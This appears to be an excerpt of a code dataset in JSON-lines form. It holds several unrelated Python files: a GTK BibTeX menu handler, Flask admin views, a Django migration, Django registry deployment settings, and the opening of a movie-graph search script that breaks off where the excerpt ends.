+{"seq_id":"197608192","text":"import gi\n# import pybib\n# import view\n# import os\nimport io\nfrom gi.repository import Gtk\ngi.require_version(\"Gtk\", \"3.0\")\n\n\nclass MenuManager:\n\n def __init__(self):\n self.parsing = pybib.parser()\n self.TreeView = view.treeview()\n\n def file_new_clicked(self, widget):\n dialog = Gtk.FileChooserDialog(\"Open an existing fine\", None,\n Gtk.FileChooserAction.OPEN,\n (Gtk.STOCK_CANCEL,\n Gtk.ResponseType.CANCEL,\n Gtk.STOCK_OPEN, Gtk.ResponseType.OK))\n # self.add_filters(dialog)\n response = dialog.run()\n if response == Gtk.ResponseType.OK:\n self.filename = dialog.get_filename()\n return(self.filename)\n elif response == Gtk.ResponseType.CANCEL:\n print(\"Cancel clicked\")\n\n dialog.destroy()\n\n def file_open_clicked(self, SimpleAction, parameter):\n dialog = Gtk.FileChooserDialog(\"Open an existing fine\", None,\n Gtk.FileChooserAction.OPEN,\n (Gtk.STOCK_CANCEL,\n Gtk.ResponseType.CANCEL,\n Gtk.STOCK_OPEN, Gtk.ResponseType.OK))\n filter = Gtk.FileFilter()\n filter.set_name(\"BiBTex File\")\n filter.add_pattern(\"*.bib\")\n dialog.add_filter(filter)\n filter = Gtk.FileFilter()\n filter.set_name(\"All Files\")\n filter.add_pattern(\"*\")\n dialog.add_filter(filter)\n\n response = dialog.run()\n if response == Gtk.ResponseType.OK:\n filename = dialog.get_filename()\n dialog.destroy()\n del self.TreeView.full_list[:]\n del self.parsing.booklist[:]\n self.TreeView.bookstore.clear()\n self.TreeView.indxcount = 0\n with open(filename, \"r\") as filename:\n self.parsing.parsing_read(filename)\n self.TreeView.viewer(self.parsing.booklist)\n elif response == Gtk.ResponseType.CANCEL:\n print(\"Cancel clicked\")\n dialog.destroy()\n\n def file_save_as_clicked(self, SimpleAction, parameter):\n dialog = Gtk.FileChooserDialog(\"Save as an existing file\", None,\n Gtk.FileChooserAction.SAVE,\n (Gtk.STOCK_CANCEL,\n Gtk.ResponseType.CANCEL,\n Gtk.STOCK_SAVE, Gtk.ResponseType.OK))\n filter = Gtk.FileFilter()\n filter.set_name(\"BiBTex File\")\n filter.add_pattern(\"*.bib\")\n dialog.add_filter(filter)\n filter = Gtk.FileFilter()\n filter.set_name(\"All Files\")\n filter.add_pattern(\"*\")\n dialog.add_filter(filter)\n\n response = dialog.run()\n if response == Gtk.ResponseType.OK:\n filename = dialog.get_filename()\n print(filename)\n self.parsing.parsing_write(filename)\n elif response == Gtk.ResponseType.CANCEL:\n print(\"Cancel clicked\")\n dialog.destroy()\n\n def on_menu_file_quit(self, widget):\n Gtk.main_quit()\n\n # def on_menu_others(self, widget):\n # print(\"Menu item \" + widget.get_name() + \" was selected\")\n\n # def on_menu_choices_changed(self, widget, current):\n # filename = current.get_name()+\".xml\"\n # print(filename + \" will be opened\")\n\n def create_textview(self, SimpleAction, parameter):\n self.popup = Gtk.Window()\n self.popup.set_title(\"Add a complete bibtex entry\")\n self.popup.set_default_size(350, 350)\n grid = Gtk.Grid()\n scrolw = Gtk.ScrolledWindow()\n scrolw.set_hexpand(True)\n scrolw.set_vexpand(True)\n button = Gtk.Button(\"Create\")\n button.connect(\"clicked\", self.create_from_buffer)\n tview = Gtk.TextView()\n tview.set_wrap_mode(Gtk.WrapMode.WORD)\n\n # Get the buffer\n self.textbuffer = tview.get_buffer()\n scrolw.add(tview)\n grid.attach(scrolw, 0, 0, 10, 10)\n grid.attach(button, 0, 11, 10, 1)\n self.popup.add(grid)\n self.popup.show_all()\n\n def create_from_buffer(self, widget):\n start_iter = self.textbuffer.get_start_iter()\n end_iter = self.textbuffer.get_end_iter()\n text = 
io.StringIO(self.textbuffer.get_text(start_iter,\n end_iter, True))\n del self.parsing.booklist[:]\n self.parsing.parsing_read(text)\n self.TreeView.viewer(self.parsing.booklist)\n self.popup.destroy()\n","sub_path":"ptbl/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
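The record repeats the same `Gtk.FileChooserDialog` setup in three handlers, and the import-order fix above matters: `gi.require_version` has to run before `from gi.repository import Gtk`. A condensed sketch of one reusable chooser, using only GTK 3 calls that already appear in the record; `choose_bib_file` is an illustrative helper name, not part of the file:

```python
# Sketch: one reusable file chooser with the .bib filter from the record.
import gi
gi.require_version("Gtk", "3.0")   # must precede the Gtk import
from gi.repository import Gtk

def choose_bib_file(parent=None):
    dialog = Gtk.FileChooserDialog(
        "Open an existing file", parent, Gtk.FileChooserAction.OPEN,
        (Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,
         Gtk.STOCK_OPEN, Gtk.ResponseType.OK))
    bib_filter = Gtk.FileFilter()
    bib_filter.set_name("BibTeX File")
    bib_filter.add_pattern("*.bib")
    dialog.add_filter(bib_filter)
    filename = dialog.get_filename() if dialog.run() == Gtk.ResponseType.OK else None
    dialog.destroy()               # always destroy, even on cancel
    return filename
```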
+{"seq_id":"198661524","text":"#app/admin/views\n\nfrom flask import abort, render_template, url_for, redirect, flash\nfrom flask_login import current_user, login_required\n\nfrom . import admin\nfrom .forms import DepartmentForm, RoleForm, EmployeeAssignForm\nfrom .. import db\nfrom ..models import Department, Role, Employee\n\ndef check_admin():\n\n \"\"\"\n prevent non-admin user to access this page\n\n \"\"\"\n if not current_user.is_admin:\n abort(403)\n\n@admin.route('/departments/list', methods=['GET','POST'])\n@login_required\ndef list_departments():\n \"\"\"\n List all departments\n\n \"\"\"\n\n check_admin()\n departments = Department.query.all()\n return render_template('list_departments.html', departments=departments, title='Departments')\n\n@admin.route('/departments/add', methods=['GET','POST'])\n@login_required\ndef add_department():\n\n \"\"\"\n add department to the database\n\n \"\"\"\n check_admin()\n add_department = True\n\n form = DepartmentForm()\n if form.validate_on_submit():\n department = Department(name=form.name.data, description=form.description.data)\n try:\n # add department to the database\n\n db.session.add(department)\n db.session.commit()\n flash('You has successfully added a new department')\n except:\n # in case department name already exists\n flash('Error: Your new department name already exists')\n return redirect(url_for('admin.list_departments'))\n #load department template\n return render_template('department.html', action='Add', add_department=add_department, form=form, title='Add Department')\n\n\n@admin.route('/departments/edit/', methods=['GET','POST'])\n@login_required\ndef edit_department(id):\n\n \"\"\"\n edit a department\n\n \"\"\"\n check_admin()\n\n add_department=False\n department =Department.query.get_or_404(id)\n form = DepartmentForm(obj=department)\n if form.validate_on_submit():\n department.name=form.name.data\n department.description = form.description.data\n db.session.commit()\n flash('You have successfully edited this department')\n # return to list department page\n return redirect(url_for('admin.list_departments'))\n\n form.name.data = department.name\n form.description.data = department.description\n return render_template('department.html', action='Edit', add_department=add_department, department=department, form=form, title='Edit Depart,ent')\n\n\n@admin.route('/departments/delete/', methods=['GET','POST'])\n@login_required\ndef delete_department(id):\n \"\"\"\n delete a department from database\n\n \"\"\"\n\n check_admin()\n department =Department.query.get_or_404(id)\n db.session.delete(department)\n db.session.commit()\n\n flash('You have successfully deleted a department')\n\n return redirect(url_for('admin.list_departments'))\n\n return render_template(title='Delete Department')\n\n\n@admin.route('/roles/list', methods=['GET', 'POST'])\n@login_required\ndef list_roles():\n \"\"\"\n list all roles in the database\n \"\"\"\n check_admin()\n roles = Role.query.all()\n return render_template('list_roles.html', roles=roles, title='roles')\n\n@admin.route('/roles/add', methods=['GET','POST'])\n@login_required\ndef add_role():\n \"\"\"\n add a role into database\n \"\"\"\n check_admin()\n add_role = True\n form = RoleForm()\n if form.validate_on_submit():\n\n # add the new role to database if the role name is not duplicated\n try:\n role = Role(name=form.name.data, description=form.description.data)\n db.session.add(role)\n db.session.commit()\n flash('You has successfully added a new role')\n\n except:\n # if the 
duplicated entry is found\n flash('Errors: role name already existed')\n #return to roles list\n return redirect(url_for('admin.list_roles'))\n # render to form where can fill up the name and description\n return render_template('role.html', add_role=add_role, form=form, title='Add role')\n\n\n@admin.route('/roles/edit/', methods=['GET','POST'])\n@login_required\ndef edit_role(id):\n \"\"\"\n edit one role\n \"\"\"\n check_admin()\n add_role=False\n role = Role.query.get_or_404(id)\n form = RoleForm(object=role)\n if form.validate_on_submit():\n # update current role\n role.name = form.name.data\n role.description = form.description.data\n db.session.commit()\n flash('You have successfully updated the role')\n redirect(url_for('admin.list_roles'))\n form.name.data = role.name\n form.description.data = role.description\n return render_template('role.html', add_role=add_role, form=form, title='Edit role')\n\n\n@admin.route('/roles/delete/', methods=['GET','POST'])\n@login_required\ndef delete_role(id):\n \"\"\"\n\n delete a role\n \"\"\"\n check_admin()\n add_role=False\n role = Role.query.get_or_404(id)\n db.session.delete(role)\n db.session.commit()\n flash('You have successfully deleted a role')\n\n #redirect to roles list\n return redirect(url_for('admin.list_roles'))\n\n return render_template(title='Delete role')\n\n\n@admin.route('/employees')\n@login_required\ndef list_employees():\n \"\"\"\n assign department and role to employee\n \"\"\"\n check_admin()\n employees = Employee.query.all()\n return render_template('list_employees.html', employees=employees, title='Employees')\n\n@admin.route('/employee/assign/', methods=['GET','POST'])\n@login_required\ndef assign_employee(id):\n \"\"\"\n assign a department and role to employee\n \"\"\"\n check_admin()\n employee = Employee.query.get_or_404(id)\n if employee.is_admin:\n abort(403)\n\n form = EmployeeAssignForm(obj=employee)\n if form.validate_on_submit():\n employee.department = form.department.data\n employee.role = form.role.data\n db.session.add(employee)\n db.session.commit()\n\n flash('You have successfully assign department and role to employee')\n return redirect(url_for('admin.list_employees'))\n return render_template('employee.html', employee=employee, form=form, title='Assign Employee')","sub_path":"app/admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
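The `add_department`/`add_role` handlers above rely on a bare `except` to detect duplicate names, which also swallows unrelated database errors. A sketch of the narrower pattern, assuming SQLAlchemy's `IntegrityError` is what the unique-name constraint raises here; `add_department_safely` is an illustrative helper, not part of the views:

```python
# Sketch: catch only the duplicate-key failure and roll the session back
# so it stays usable for subsequent requests.
from sqlalchemy.exc import IntegrityError

def add_department_safely(db, Department, name, description):
    department = Department(name=name, description=description)
    try:
        db.session.add(department)
        db.session.commit()
        return True                # added
    except IntegrityError:
        db.session.rollback()      # required before reusing the session
        return False               # name already exists
```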
+{"seq_id":"496930533","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('CRM', '0010_auto_20160521_1410'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='appointment',\n name='record',\n field=models.OneToOneField(related_name='appointments', null=True,\n verbose_name=b'\\xe5\\x92\\xa8\\xe8\\xaf\\xa2\\xe8\\xae\\xb0\\xe5\\xbd\\x95',\n to='CRM.Record'),\n ),\n ]\n","sub_path":"CRM/migrations/0011_auto_20160521_1411.py","file_name":"0011_auto_20160521_1411.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"137202724","text":"\"\"\"\nDjango settings for the nmrr project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/2.2/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/2.2/ref/settings/\n\"\"\"\nimport os\n\nfrom core_main_app.utils.logger.logger_utils import (\n set_generic_handler,\n set_generic_logger,\n update_logger_with_local_app,\n)\nfrom mongoengine.connection import connect\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ[\"DJANGO_SECRET_KEY\"]\n# SECURITY WARNING: only list host/domain names that this Django site can serve\nALLOWED_HOSTS = os.environ[\"ALLOWED_HOSTS\"].split(\",\") if \"ALLOWED_HOSTS\" in os.environ else []\n# SERVER URI\nSERVER_URI = os.environ[\"SERVER_URI\"]\n\n# Databases\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.postgresql_psycopg2\",\n \"HOST\": os.environ[\"POSTGRES_HOST\"] if \"POSTGRES_HOST\" in os.environ else None,\n \"PORT\": int(os.environ[\"POSTGRES_PORT\"]) if \"POSTGRES_PORT\" in os.environ else 5432,\n \"NAME\": os.environ[\"POSTGRES_DB\"] if \"POSTGRES_DB\" in os.environ else None,\n \"USER\": os.environ[\"POSTGRES_USER\"] if \"POSTGRES_USER\" in os.environ else None,\n \"PASSWORD\": os.environ[\"POSTGRES_PASS\"] if \"POSTGRES_PASS\" in os.environ else None,\n }\n}\n\nMONGO_HOST = os.environ[\"MONGO_HOST\"] if \"MONGO_HOST\" in os.environ else \"\"\nMONGO_PORT = os.environ[\"MONGO_PORT\"] if \"MONGO_PORT\" in os.environ else \"27017\"\nMONGO_DB = os.environ[\"MONGO_DB\"] if \"MONGO_DB\" in os.environ else \"\"\nMONGO_USER = os.environ[\"MONGO_USER\"] if \"MONGO_USER\" in os.environ else \"\"\nMONGO_PASS = os.environ[\"MONGO_PASS\"] if \"MONGO_PASS\" in os.environ else \"\"\nMONGODB_URI = (\n f\"mongodb://{MONGO_USER}:{MONGO_PASS}@{MONGO_HOST}:{MONGO_PORT}/{MONGO_DB}\"\n)\nconnect(MONGO_DB, host=MONGODB_URI)\n\n\nBROKER_TRANSPORT_OPTIONS = {\n \"visibility_timeout\": 3600,\n \"fanout_prefix\": True,\n \"fanout_patterns\": True,\n}\nREDIS_HOST = os.environ[\"REDIS_HOST\"] if \"REDIS_HOST\" in os.environ else \"\"\nREDIS_PORT = os.environ[\"REDIS_PORT\"] if \"REDIS_PORT\" in os.environ else \"6379\"\nREDIS_PASS = os.environ[\"REDIS_PASS\"] if \"REDIS_PASS\" in os.environ else None\nREDIS_URL = f\"redis://:{REDIS_PASS}@{REDIS_HOST}:{REDIS_PORT}\"\n\nBROKER_URL = REDIS_URL\nCELERY_RESULT_BACKEND = REDIS_URL\n\n# Label customization\nWEBSITE_SHORT_TITLE = \"NMRR\"\nCUSTOM_DATA = \"Materials Data\"\nCUSTOM_NAME = os.environ[\"SERVER_NAME\"]\nCUSTOM_TITLE = \"Materials Resource Registry\"\nCUSTOM_SUBTITLE = \"Part of the Materials Genome Initiative\"\nCURATE_MENU_NAME = \"Publish resource\"\nEXPLORE_MENU_NAME = \"Search for resources\"\nWEBSITE_ADMIN_COLOR = \"blue\"\n# black, black-light, blue, blue-light, green, green-light, purple, purple-light, red, red-light, yellow, yellow-light\n\nif SERVER_URI.lower().startswith(\"https\"):\n # Activate HTTPS\n os.environ[\"HTTPS\"] = \"on\"\n\n # Secure cookies\n CSRF_COOKIE_SECURE = True\n CSRF_COOKIE_AGE = None\n SESSION_COOKIE_SECURE = True\n SESSION_EXPIRE_AT_BROWSER_CLOSE = True\n SESSION_COOKIE_AGE = 604800\n\n # Set x-frame options\n X_FRAME_OPTIONS = \"SAMEORIGIN\"\n\n# Application definition\nINSTALLED_APPS = (\n \"django.contrib.admin\",\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n 
\"django.contrib.messages\",\n \"django.contrib.sites\",\n \"django.contrib.staticfiles\",\n # Extra apps\n \"rest_framework\",\n \"drf_yasg\",\n \"rest_framework_mongoengine\",\n \"menu\",\n \"tz_detect\",\n \"defender\",\n \"captcha\",\n # Core apps\n \"core_main_app\",\n \"core_main_registry_app\",\n \"core_website_app\",\n \"core_oaipmh_common_app\",\n \"core_oaipmh_harvester_app\",\n \"core_oaipmh_provider_app\",\n \"core_curate_registry_app\",\n \"core_curate_app\",\n \"core_parser_app\",\n \"core_parser_app.tools.modules\", # FIXME: make modules an app\n \"core_parser_app.tools.parser\", # FIXME: make parser an app\n \"core_explore_keyword_registry_app\", # /!\\ Should always be before core_explore_common_app\n \"core_explore_keyword_app\",\n \"core_explore_common_app\",\n \"core_explore_oaipmh_app\",\n \"core_dashboard_registry_app\",\n \"core_dashboard_common_app\",\n \"mptt\",\n \"core_linked_records_app\",\n # Modules\n \"core_module_local_id_registry_app\",\n \"core_module_status_registry_app\",\n \"core_module_fancy_tree_registry_app\",\n \"core_module_text_area_app\",\n # Local apps\n \"nmrr_home\",\n)\nMIDDLEWARE = (\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.middleware.locale.LocaleMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"defender.middleware.FailedLoginMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n \"django.middleware.security.SecurityMiddleware\",\n \"tz_detect.middleware.TimezoneMiddleware\",\n)\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nROOT_URLCONF = \"nmrr.urls\"\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": [\"templates\"],\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n \"core_main_app.utils.custom_context_processors.domain_context_processor\", # Needed by any curator app\n \"django.template.context_processors.i18n\",\n ],\n },\n },\n]\n\nWSGI_APPLICATION = \"nmrr.wsgi.application\"\n\n# Internationalization\n# https://docs.djangoproject.com/en/2.2/topics/i18n/\n\nLANGUAGE_CODE = \"en-us\"\n\nTIME_ZONE = \"UTC\"\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nLOCALE_PATHS = (os.path.join(BASE_DIR, \"locale\"),)\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.2/howto/static-files/\n\nSTATIC_URL = \"/static/\"\nSTATIC_ROOT = \"static.prod\"\n\nSTATICFILES_FINDERS = (\n \"django.contrib.staticfiles.finders.AppDirectoriesFinder\",\n \"django.contrib.staticfiles.finders.FileSystemFinder\",\n)\n\nSTATICFILES_DIRS = (\"static\",)\n\n# Logging\nLOGGING_SERVER = True\nLOGGING_CLIENT = True\nLOGGING_DB = True\n\nLOGGER_FILE_SERVER = os.path.join(BASE_DIR, \"logfile_server.txt\")\nLOGGER_FILE_CLIENT = os.path.join(BASE_DIR, \"logfile_client.txt\")\nLOGGER_FILE_DB = os.path.join(BASE_DIR, \"logfile_db.txt\")\nLOGGER_FILE_SECURITY = os.path.join(BASE_DIR, \"logfile_security.txt\")\nLOGGER_FILE_APP = os.path.join(BASE_DIR, \"logfile_app.txt\")\n\nLOGGER_LEVEL = os.getenv(\"DJANGO_LOG_LEVEL\", \"DEBUG\")\nLOGGER_CLIENT_LEVEL = os.getenv(\"DJANGO_LOG_LEVEL\", 
\"DEBUG\")\nLOGGER_SERVER_LEVEL = os.getenv(\"DJANGO_LOG_LEVEL\", \"DEBUG\")\nLOGGER_DB_LEVEL = os.getenv(\"DJANGO_LOG_LEVEL\", \"DEBUG\")\nLOGGER_APP_LEVEL = os.getenv(\"DJANGO_LOG_LEVEL\", \"DEBUG\")\n\nLOGGER_MAX_BYTES = 500000\nLOGGER_BACKUP_COUNT = 2\n\nlocal_logger_conf = {\n \"handlers\": [\"app_handler\", \"console\"],\n \"level\": LOGGER_APP_LEVEL,\n}\n\nLOGGING = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"fmt-default\": {\n \"format\": \"%(levelname)s: %(asctime)s\\t%(name)s\\t%(pathname)s\\tl.%(lineno)s\\t%(message)s\",\n \"datefmt\": \"%Y-%m-%d %H:%M:%S\",\n },\n },\n \"handlers\": {\n \"logfile-security\": {\n \"level\": \"DEBUG\",\n \"class\": \"logging.handlers.RotatingFileHandler\",\n \"filename\": LOGGER_FILE_SECURITY,\n \"maxBytes\": LOGGER_MAX_BYTES,\n \"backupCount\": LOGGER_BACKUP_COUNT,\n \"formatter\": \"fmt-default\",\n },\n \"console\": {\n \"level\": \"INFO\",\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"fmt-default\",\n },\n \"app_handler\": {\n \"level\": LOGGER_APP_LEVEL,\n \"class\": \"logging.handlers.RotatingFileHandler\",\n \"filename\": LOGGER_FILE_APP,\n \"maxBytes\": LOGGER_MAX_BYTES,\n \"backupCount\": LOGGER_BACKUP_COUNT,\n \"formatter\": \"fmt-default\",\n },\n },\n \"loggers\": {\n \"django.security\": {\n \"handlers\": [\"console\", \"logfile-security\"],\n \"level\": LOGGER_LEVEL,\n \"propagate\": True,\n },\n },\n}\n\nupdate_logger_with_local_app(LOGGING, local_logger_conf, INSTALLED_APPS)\n\nif LOGGING_CLIENT:\n set_generic_handler(\n LOGGING,\n \"logfile-template\",\n LOGGER_CLIENT_LEVEL,\n LOGGER_FILE_CLIENT,\n LOGGER_MAX_BYTES,\n LOGGER_BACKUP_COUNT,\n \"logging.handlers.RotatingFileHandler\",\n )\n set_generic_logger(\n LOGGING, \"django.template\", LOGGER_CLIENT_LEVEL, [\"console\", \"logfile-template\"]\n )\n set_generic_handler(\n LOGGING,\n \"logfile-request\",\n LOGGER_CLIENT_LEVEL,\n LOGGER_FILE_CLIENT,\n LOGGER_MAX_BYTES,\n LOGGER_BACKUP_COUNT,\n \"logging.handlers.RotatingFileHandler\",\n )\n set_generic_logger(\n LOGGING, \"django.request\", LOGGER_CLIENT_LEVEL, [\"console\", \"logfile-request\"]\n )\n\nif LOGGING_SERVER:\n set_generic_handler(\n LOGGING,\n \"logfile-server\",\n LOGGER_SERVER_LEVEL,\n LOGGER_FILE_SERVER,\n LOGGER_MAX_BYTES,\n LOGGER_BACKUP_COUNT,\n \"logging.handlers.RotatingFileHandler\",\n )\n set_generic_logger(\n LOGGING, \"django.server\", LOGGER_SERVER_LEVEL, [\"console\", \"logfile-server\"]\n )\n\nif LOGGING_DB:\n set_generic_handler(\n LOGGING,\n \"logfile-django-db-backend\",\n LOGGER_DB_LEVEL,\n LOGGER_FILE_DB,\n LOGGER_MAX_BYTES,\n LOGGER_BACKUP_COUNT,\n \"logging.handlers.RotatingFileHandler\",\n )\n set_generic_logger(\n LOGGING,\n \"django.db.backends\",\n LOGGER_DB_LEVEL,\n [\"console\", \"logfile-django-db-backend\"],\n )\n\n# Password settings for django.contrib.auth validators\n# Specifies the minimum length for passwords.\nPASSWORD_MIN_LENGTH = 5\n# Specifies the minimum amount of required letters in a password.\nPASSWORD_MIN_LETTERS = 0\n# Specifies the minimum amount of required uppercase letters in a password.\nPASSWORD_MIN_UPPERCASE_LETTERS = 0\n# Specifies the minimum amount of required lowercase letters in a password.\nPASSWORD_MIN_LOWERCASE_LETTERS = 0\n# Specifies the minimum amount of required numbers in a password.\nPASSWORD_MIN_NUMBERS = 0\n# Specifies the minimum amount of required symbols in a password.\nPASSWORD_MIN_SYMBOLS = 0\n# Specifies the maximum amount of consecutive characters allowed in passwords.\nPASSWORD_MAX_OCCURRENCE 
= None\n\nMENU_SELECT_PARENTS = False\n\"\"\" boolean: Control if parent menu items should automatically have their selected property set to True if one of \ntheir children has its selected property set to True\n\"\"\"\n\nDATA_SOURCES_EXPLORE_APPS = [\"core_explore_oaipmh_app\"]\n\"\"\" List of data sources for the exploration apps\n\"\"\"\n\nSWAGGER_SETTINGS = {\n \"exclude_namespaces\": [], # List URL namespaces to ignore\n \"api_version\": \"1.1\", # Specify your API's version\n \"api_path\": \"/\", # Specify the path to your API not a root level\n \"enabled_methods\": [ # Specify which methods to enable in Swagger UI\n \"get\",\n \"post\",\n \"put\",\n \"patch\",\n \"delete\",\n ],\n \"api_key\": \"\", # An API key\n \"is_authenticated\": False, # Set to True to enforce user authentication,\n \"is_superuser\": False, # Set to True to enforce admin only access\n \"LOGIN_URL\": \"core_main_app_login\",\n \"LOGOUT_URL\": \"core_main_app_logout\",\n}\n\nREST_FRAMEWORK = {\n \"DEFAULT_AUTHENTICATION_CLASSES\": (\n \"rest_framework.authentication.BasicAuthentication\",\n \"rest_framework.authentication.SessionAuthentication\",\n ),\n}\n\n# Registry configuration\nREGISTRY_XSD_FILENAME = \"res-md.xsd\"\n\"\"\" str: Registry xsd filename used for the initialisation.\n\"\"\"\n\n# If you want to use your own schema, set your schema here\nREGISTRY_XSD_FILEPATH = os.path.join(\"xsd\", REGISTRY_XSD_FILENAME)\n\"\"\" str: Registry xsd path used for the initialisation.\n\"\"\"\n\n# If you want to use your own configuration file, set your configuration file here\nCUSTOM_REGISTRY_FILE_PATH = os.path.join(\"json\", \"custom_registry.json\")\n\"\"\" str: Custom registry configuration file path used for the initialisation.\n\"\"\"\n\nDEFAULT_DATA_RENDERING_XSLT = os.path.join(\n \"core_main_registry_app\", \"xsl\", \"xml2html.xsl\"\n)\n\nPARSER_DOWNLOAD_DEPENDENCIES = True\n\"\"\" boolean: Should the XSD parser download dependencies\n\"\"\"\n\nEXPLORE_ADD_DEFAULT_LOCAL_DATA_SOURCE_TO_QUERY = True\n\"\"\" boolean: Do we add the local data source to new queries by default\n\"\"\"\n\nSSL_CERTIFICATES_DIR = True\n\"\"\" boolean: Control whether requests verify the server's TLS certificate\n string: Path to a CA bundle\n\"\"\"\n\nVERIFY_DATA_ACCESS = False\n\"\"\" :py:class:`bool`: Additional checks that data returned by a query can be accessed (slow).\n\"\"\"\n\nDISPLAY_EDIT_BUTTON = False\n\"\"\" boolean: Display the edit button on the result page\n\"\"\"\n\nDATA_SORTING_FIELDS = [\"-last_modification_date\"]\n\"\"\" Array: Default sort fields for the data query. \n\"\"\"\n\nDATA_DISPLAYED_SORTING_FIELDS = [\n {\n \"field\": \"last_modification_date\",\n \"display\": \"Last updated\",\n \"ordering\": \"-last_modification_date\",\n },\n {\n \"field\": \"last_modification_date\",\n \"display\": \"First updated\",\n \"ordering\": \"+last_modification_date\",\n },\n {\"field\": \"title\", \"display\": \"Title (A-Z)\", \"ordering\": \"+title\"},\n {\"field\": \"title\", \"display\": \"Title (Z-A)\", \"ordering\": \"-title\"},\n]\n\"\"\"The default sorting fields displayed on the GUI, Data model field Array\"\"\"\n\nSORTING_DISPLAY_TYPE = \"single\"\n\"\"\"Result sorting graphical display type ('multi' / 'single')\"\"\"\n\nDEFAULT_DATE_TOGGLE_VALUE = False\n\"\"\" boolean: Set the toggle default value in the records list\n\"\"\"\n\n# Configure Django Defender\nDEFENDER_REDIS_URL = REDIS_URL\n\"\"\" :py:class:`str`: The Redis url for defender. 
\n\"\"\"\nDEFENDER_COOLOFF_TIME = 60\n\"\"\" integer: Period of inactivity after which old failed login attempts will be forgotten\n\"\"\"\nDEFENDER_LOGIN_FAILURE_LIMIT = 3\n\"\"\" integer: The number of login attempts allowed before a record is created for the failed login.\n\"\"\"\nDEFENDER_STORE_ACCESS_ATTEMPTS = True\n\"\"\" boolean: Store the login attempt to the database.\n\"\"\"\nDEFENDER_USE_CELERY = True\n\"\"\" boolean: Use Celery to store the login attempt to the database.\n\"\"\"\nDEFENDER_LOCKOUT_URL = \"/locked\"\n\"\"\" string: url to the defender error page (defined in core_main_registry_app)\n\"\"\"\nDISPLAY_PRIVACY_POLICY_FOOTER = True\n\"\"\" boolean: display the privacy policy link in the footer\n\"\"\"\nDISPLAY_TERMS_OF_USE_FOOTER = True\n\"\"\" boolean: display the terms of use link in the footer\n\"\"\"\nDISPLAY_CONTACT_FOOTER = True\n\"\"\" boolean: display the contact link in the footer\n\"\"\"\nDISPLAY_HELP_FOOTER = True\n\"\"\" boolean: display the help link in the footer\n\"\"\"\nDISPLAY_RULES_OF_BEHAVIOR_FOOTER = True\n\"\"\" boolean: display the rules of behavior link in the footer\n\"\"\"\n\nAUTO_SET_PID = True\n\"\"\" boolean: enable the automatic pid generation for saved data.\n\"\"\"\n\nID_PROVIDER_SYSTEMS = {\n \"local\": {\n \"class\": \"core_linked_records_app.utils.providers.local.LocalIdProvider\",\n \"args\": [],\n },\n}\n\"\"\" dict: provider systems available for registering PIDs\n\"\"\"\n\nID_PROVIDER_PREFIXES = [\"cdcs\"]\n\"\"\" list: accepted prefixes if manually specifying PIDs (first item is the\ndefault prefix)\n\"\"\"\n\nPID_XPATH = \"Resource.@localid\"\n\"\"\" string: location of the PID in the document, specified as dot notation\n\"\"\"\n\nCAN_SET_WORKSPACE_PUBLIC = False\n\"\"\" boolean: Can make a private workspace public\n\"\"\"\n\nCAN_SET_PUBLIC_DATA_TO_PRIVATE = False\n\"\"\" boolean: Can public data be made private\n\"\"\"\n\nCAN_ANONYMOUS_ACCESS_PUBLIC_DOCUMENT = True\n\"\"\" boolean: Can anonymous users access public data\n\"\"\"\n","sub_path":"deploy/cdcs/nmrr.settings.py","file_name":"nmrr.settings.py","file_ext":"py","file_size_in_byte":16059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"277973791","text":"import csv\nimport sys\nimport math\n\nfrom util import Node, StackFrontier, QueueFrontier\n\n# Maps names to a set of corresponding person_ids\nnames = {}\n\n# Maps person_ids to a dictionary of: name, birth, movies (a set of movie_ids)\npeople = {}\n\n# Maps movie_ids to a dictionary of: title, year, stars (a set of person_ids)\nmovies = {}\n\n\ndef load_data(directory):\n \"\"\"\n Load data from CSV files into memory.\n \"\"\"\n # Load people\n with open(f\"{directory}/people.csv\", encoding=\"utf-8\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n people[row[\"id\"]] = {\n \"name\": row[\"name\"],\n \"birth\": row[\"birth\"],\n \"movies\": set()\n }\n if row[\"name\"].lower() not in names:\n names[row[\"name\"].lower()] = {row[\"id\"]}\n else:\n names[row[\"name\"].lower()].add(row[\"id\"])\n\n # Load movies\n with open(f\"{directory}/movies.csv\", encoding=\"utf-8\") as f:\n reader = csv.DictReader(f)\n for row in 